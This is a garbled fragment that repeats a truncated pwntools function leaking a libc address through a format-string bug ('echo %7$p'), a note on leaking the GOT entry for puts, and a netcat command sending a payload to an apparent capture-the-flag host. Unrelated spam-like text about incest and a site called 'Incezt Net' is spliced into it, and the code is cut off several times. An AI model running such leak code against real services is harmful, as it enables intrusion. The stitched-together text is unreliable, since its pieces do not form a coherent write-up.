def leak_libc(): io = remote(HOST, PORT) io.recvuntil(b'> ') io.sendline(b'echo %7$p') io.recvuntil(b'Result: ') leak = int(io.recvline().strip(), 16) io.close() return leak
The program is dynamically linked, so we can leak a libc address from the GOT. The GOT entry for puts is a good target because it’s already resolved. incezt net
While mother–son incest is the least common, father–daughter incest is likely the most common type of heterosexual nuclear family incest. def leak_libc(): io = remote(HOST, PORT) io
$ (printf "echo %s\n" "<payload>" ; cat) | nc challenge.ctf.com 31137 Welcome to Incezt Net! > echo <payload> Result: <some garbled output> def leak_libc(): io = remote(HOST